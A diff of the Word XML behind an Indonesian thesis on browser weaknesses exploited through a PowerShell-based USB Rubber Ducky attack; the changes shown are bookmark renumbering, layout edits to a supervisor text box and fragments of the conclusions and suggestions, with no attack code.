         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46368,7 +43276,8 @@
         </w:rPr>
         <w:t>browser</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="163"/>
+      <w:bookmarkEnd w:id="188"/>
+      <w:bookmarkEnd w:id="191"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46404,7 +43313,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="164" w:name="_Hlk43257850"/>
+      <w:bookmarkStart w:id="192" w:name="_Hlk43257850"/>
+      <w:bookmarkStart w:id="193" w:name="_Hlk43342393"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46425,6 +43335,7 @@
         </w:rPr>
         <w:t>USB pada perangkat komputer</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="193"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46440,13 +43351,15 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="194" w:name="_Hlk43342401"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Memblokir Unduhan Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="164"/>
+      <w:bookmarkEnd w:id="192"/>
+      <w:bookmarkEnd w:id="194"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46461,7 +43374,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="165" w:name="_Toc43264867"/>
+      <w:bookmarkStart w:id="195" w:name="_Toc43264867"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46469,7 +43382,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Kesimpulan dan Saran</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="165"/>
+      <w:bookmarkEnd w:id="195"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46478,14 +43391,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="166" w:name="_Toc43264868"/>
+      <w:bookmarkStart w:id="196" w:name="_Toc43264868"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Kesimpulan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="166"/>
+      <w:bookmarkEnd w:id="196"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46495,12 +43408,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="197" w:name="_Hlk43342541"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Berdasarkan hasil penelitian yang telah dilakukan, dapat diambil kesimpulan sebagaimana berikut:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="197"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46516,6 +43431,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="198" w:name="_Hlk43342579"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46682,6 +43598,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> yang tersimpan.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="198"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46697,6 +43614,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="199" w:name="_Hlk43342592"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46801,6 +43719,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> ataupun komputer target tidak terhubung ke internet.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="199"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46977,7 +43896,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="167" w:name="_Toc43264869"/>
+      <w:bookmarkStart w:id="200" w:name="_Toc43264869"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46985,7 +43904,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Saran</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="167"/>
+      <w:bookmarkEnd w:id="200"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46995,12 +43914,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="201" w:name="_Hlk43342621"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Untuk penelitian lebih lanjut, terdapat saran-saran yang dapat membantu untuk mengembangkan penelitian dimasa yang akan datang, yaitu:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="201"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47016,6 +43937,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="202" w:name="_Hlk43342643"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -47090,6 +44012,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="202"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47105,6 +44028,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="203" w:name="_Hlk43342652"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -47125,8 +44049,9 @@
         </w:rPr>
         <w:t>penyerangan yang disediakan Nirsoft.com, selalu usahakan untuk menggunakan versi terbaru untuk setiap program yang digunakan.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="168" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="168"/>
+      <w:bookmarkStart w:id="204" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="203"/>
+      <w:bookmarkEnd w:id="204"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47170,7 +44095,7 @@
         </w:numPr>
         <w:ind w:left="431" w:hanging="143"/>
       </w:pPr>
-      <w:bookmarkStart w:id="169" w:name="_Toc43264870"/>
+      <w:bookmarkStart w:id="205" w:name="_Toc43264870"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR</w:t>
@@ -47178,9 +44103,9 @@
       <w:r>
         <w:t xml:space="preserve"> PUSTAKA</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="49"/>
-      <w:bookmarkEnd w:id="50"/>
-      <w:bookmarkEnd w:id="169"/>
+      <w:bookmarkEnd w:id="64"/>
+      <w:bookmarkEnd w:id="65"/>
+      <w:bookmarkEnd w:id="205"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -50807,6 +47732,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -52242,7 +49168,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FC490B28-088F-4ED4-9E6B-B8D948CF742E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A8272D84-0C6D-44CC-8199-5F70656D7BC5}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
+++ b/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
@@ -459,7 +459,7 @@
       <w:bookmarkStart w:id="1" w:name="_Toc405949670"/>
       <w:bookmarkStart w:id="2" w:name="_Toc463344411"/>
       <w:bookmarkStart w:id="3" w:name="_Toc75146097"/>
-      <w:bookmarkStart w:id="4" w:name="_Toc43426517"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc43427684"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -788,23 +788,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc43426518"/>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -813,13 +799,216 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C1C4503" wp14:editId="49D563DD">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50887004" wp14:editId="1D3E192E">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
-                  <wp:align>left</wp:align>
+                  <wp:posOffset>2849880</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>50165</wp:posOffset>
+                  <wp:posOffset>220980</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2186305" cy="2520315"/>
+                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="8" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2186305" cy="2520315"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:noFill/>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>Pembimbing</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="id-ID"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> 2</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>,</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>NIP. 17890112</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="50887004" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:224.4pt;margin-top:17.4pt;width:172.15pt;height:198.45pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>Pembimbing</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="id-ID"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> 2</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>,</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>NIP. 17890112</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7258B760" wp14:editId="507FCA85">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>0</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>231140</wp:posOffset>
                 </wp:positionV>
                 <wp:extent cx="2186305" cy="2520315"/>
                 <wp:effectExtent l="0" t="0" r="4445" b="0"/>
@@ -957,11 +1146,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype w14:anchorId="0C1C4503" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:3.95pt;width:172.15pt;height:198.45pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="7258B760" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:18.2pt;width:172.15pt;height:198.45pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -1056,210 +1241,21 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CA32FE6" wp14:editId="79B2BF59">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="margin">
-                  <wp:align>right</wp:align>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>40005</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="2186305" cy="2520315"/>
-                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
-                <wp:wrapSquare wrapText="bothSides"/>
-                <wp:docPr id="8" name="Text Box 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="2186305" cy="2520315"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:srgbClr val="FFFFFF"/>
-                        </a:solidFill>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:lang w:val="en-US"/>
-                              </w:rPr>
-                              <w:t>Pembimbing</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:lang w:val="id-ID"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> 2</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:lang w:val="en-US"/>
-                              </w:rPr>
-                              <w:t>,</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>NIP. 17890112</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="3CA32FE6" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:120.95pt;margin-top:3.15pt;width:172.15pt;height:198.45pt;z-index:251656192;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t>Pembimbing</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="id-ID"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> 2</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t>,</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>NIP. 17890112</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-                <w10:wrap type="square" anchorx="margin"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="6" w:name="_Toc405949671"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc463344412"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc405949671"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc463344412"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc43427685"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -1377,7 +1373,7 @@
                                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147DA163" wp14:editId="4AE91233">
                                   <wp:extent cx="834866" cy="1113155"/>
                                   <wp:effectExtent l="0" t="0" r="3810" b="0"/>
-                                  <wp:docPr id="77" name="Picture 77"/>
+                                  <wp:docPr id="79" name="Picture 79"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                                   </wp:cNvGraphicFramePr>
@@ -1467,7 +1463,7 @@
                           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147DA163" wp14:editId="4AE91233">
                             <wp:extent cx="834866" cy="1113155"/>
                             <wp:effectExtent l="0" t="0" r="3810" b="0"/>
-                            <wp:docPr id="77" name="Picture 77"/>
+                            <wp:docPr id="79" name="Picture 79"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -2281,7 +2277,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc43426519"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc43427686"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -3371,7 +3367,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc43426520"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc43427687"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -3646,7 +3642,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="14" w:name="_Toc75146100"/>
       <w:bookmarkStart w:id="15" w:name="_Toc463344415"/>
-      <w:bookmarkStart w:id="16" w:name="_Toc43426521"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc43427688"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>KATA PENGANTAR</w:t>
@@ -4093,7 +4089,7 @@
       </w:r>
       <w:bookmarkStart w:id="17" w:name="_Toc75146101"/>
       <w:bookmarkStart w:id="18" w:name="_Toc463344416"/>
-      <w:bookmarkStart w:id="19" w:name="_Toc43426522"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc43427689"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR ISI</w:t>
@@ -4153,14 +4149,134 @@
           <w:r>
